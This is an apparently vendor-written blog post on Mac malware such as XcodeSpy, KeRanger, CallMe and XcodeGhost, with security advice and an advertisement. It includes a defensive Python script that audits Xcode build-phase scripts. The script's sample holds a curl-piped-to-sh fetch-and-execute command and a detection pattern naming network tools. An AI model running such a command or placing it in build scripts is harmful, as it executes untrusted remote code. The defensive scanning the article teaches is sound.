In the first few weeks of the Covid-19 pandemic, we saw lots of businesses invest in VPN software and new hardware as they equipped employees to work from home. In some locations, some organizations purchased MacBooks for their employees to facilitate their work from home.
Now that working from home (WFH) is part of our daily activities, there is a growing need to know about Mac cyber attacks and Apple security threats, and to remind employees of effective security procedures on all platforms, including macOS, the Macintosh and other Apple products.
Apple’s platform seems to have enjoyed strong sales as organizations upgraded for work from home. However, even with adequate cybersecurity against Mac threats and attacks, you still need to keep your Mac protected at all costs.
The Mac is also vulnerable to malware, spyware, ransomware, and hacking, and the rate of Mac cyber attacks is increasing. Most of the malware that is affecting Macs depends on user error, while the majority of the attacks are adware rather than something more threatening.
What Are The Top Cyber Attacks Against Mac?
XcodeSpy
A Trojan hidden in Xcode projects on GitHub had the potential to spread among the Macs of iOS developers. Once installed, a malicious script runs an "EggShell backdoor". Once the backdoor is open, the Mac's camera, keyboard and microphone can be hijacked and files can be sent to the attacker.
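Xcode projects can carry shell scripts that execute at build time (Run Script build phases, stored in the project's project.pbxproj file), so a shared project should be reviewed before it is built. The following is an added example, not code from the original article: it lists every such script in a project.pbxproj and marks the ones that match a few review heuristics. The sample project text and the indicator list are constructed for illustration.

```python
import re

# Constructed project.pbxproj fragment for illustration (not from a real project).
SAMPLE_PBXPROJ = r'''
/* Begin PBXShellScriptBuildPhase section */
		AA0000000000000000000001 /* Lint */ = {
			isa = PBXShellScriptBuildPhase;
			files = (
			);
			shellPath = /bin/sh;
			shellScript = "swiftlint --quiet\n";
		};
		AA0000000000000000000002 /* Run Script */ = {
			isa = PBXShellScriptBuildPhase;
			files = (
			);
			shellPath = /bin/sh;
			shellScript = "curl -s https://example.invalid/setup.sh | sh\n";
		};
/* End PBXShellScriptBuildPhase section */
'''

SECTION = re.compile(r"/\* Begin PBXShellScriptBuildPhase section \*/(.*?)"
                     r"/\* End PBXShellScriptBuildPhase section \*/", re.S)
PHASE = re.compile(r"^\s*\w+ /\* (.*?) \*/ = \{(.*?)^\s*\};", re.S | re.M)
SCRIPT = re.compile(r'shellScript = "((?:[^"\\]|\\.)*)";', re.S)

# Heuristic review triggers (assumed for this example), not proof of malice.
INDICATORS = {
    "network fetch": re.compile(r"\b(curl|wget|nc|ncat)\b"),
    "piped to interpreter": re.compile(r"\|\s*(sh|bash|zsh|python3?|osascript)\b"),
    "encoded payload": re.compile(r"\b(base64|xxd)\b"),
    "dynamic eval": re.compile(r"\beval\b"),
}

def unescape(s):
    """Undo the backslash escaping pbxproj applies inside quoted strings."""
    return re.sub(r"\\(.)", lambda m: {"n": "\n", "t": "\t"}.get(m.group(1), m.group(1)), s, flags=re.S)

def audit_build_scripts(pbxproj_text):
    """Return (phase name, script, matched indicators) for every Run Script phase."""
    findings = []
    for section in SECTION.findall(pbxproj_text):
        for name, body in PHASE.findall(section):
            m = SCRIPT.search(body)
            script = unescape(m.group(1)) if m else ""
            hits = [label for label, rx in INDICATORS.items() if rx.search(script)]
            findings.append((name, script, hits))
    return findings

if __name__ == "__main__":
    for name, script, hits in audit_build_scripts(SAMPLE_PBXPROJ):
        print(f"{name!r}: {'REVIEW ' + ', '.join(hits) if hits else 'no indicators'}")
```

A phase with no matched indicators has still not been vetted; read every listed script before building a project from an unfamiliar source.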
FakeFileOpener
Malwarebytes uses the name FakeFileOpener to describe applications that advertise potentially unwanted programs (PUPs). These tend to be system optimizers. You may see a pop-up suggesting that you don't have software to open an app, for instance a message offering to help you locate an app on the internet. Or you may see a warning that you have been infected with different viruses, inviting you to use apps such as Mac Adware Remover, Mac Space Reviver or Advanced Mac Cleaner.
Generic.Suspicious
These accounted for more than 80% of cases. However, rather than being one rampant case of malware, this is Malwarebytes’ name for any detection that was deemed to be suspicious behavior. This could be an attempt to run concealed Python or shellcode.
KeRanger
One of the first pieces of ransomware in the Mac world, this malware started life with a valid Mac Developer ID. The malware will encrypt multiple file types and includes a process for pushing the ransom README file to the targeted user. Mitigation includes keeping systems updated and, as with all ransomware defenses, keeping offline backups.
CallMe
This is malware for the Mac that opens a backdoor onto infected systems, which can then be exploited by its command and control server. It is dropped through malicious Microsoft Office attachments; the vulnerability has been patched for modern-day versions of Office software and macOS. Users on those setups are protected against this attack.
XcodeGhost
Targeting both iOS and Mac, this compiler malware is known as “the first large-scale attack on Apple’s App Store.” With wider attacks and espionage in mind, the malware targets, captures and pulls confidential information from an infected machine. Its infection of secure apps serves as a huge warning when pulling apps from relatively unknown sources.
LaoShu
A remote access Trojan that exploits infected PDF files to spread its payload. The malware will look for some particular types of files, compressing those into an exfiltration zip file that can be pulled from the machine. Besides keeping systems updated, defending against this malware also calls for good email behavior and user training, including avoiding unknown attachments.
macOS cyber attacks have come a long way. However, the era of explosive growth seems to be behind us, and we can’t help but notice the reduction in the activity of cybercriminals on Mac.
The owners of iMacs and MacBooks have never been considered priority targets compared to Windows users, since the latter have always been more profitable for attackers.
Additionally, there is a larger number of both known and unknown exploits for Windows. Combined with the fact that Windows users tend to install updates only occasionally, this makes it easier and more convenient for cyber attackers to infect Windows systems.
To keep your macOS devices safe against cyber attacks, IT security experts recommend the following:
- Try to keep macOS and all of your apps up to date.
- Use a reliable security solution that delivers advanced protection on Mac as well as on PC and mobile devices.
- Use only legitimate software, downloaded from official web pages or installed from the Mac App Store.
- If you need to access your iCloud to find your phone when it is lost, for example, use only the official website.
- Download and install apps only from official resources such as the App Store.
If you need a cybersecurity tool to protect against Mac cyber attacks and software that can protect macOS from cyber criminals, you need Vicarius.
Vicarius is a vulnerability management software that targets cybersecurity officers as well as IT managers and operators from the U.S. market.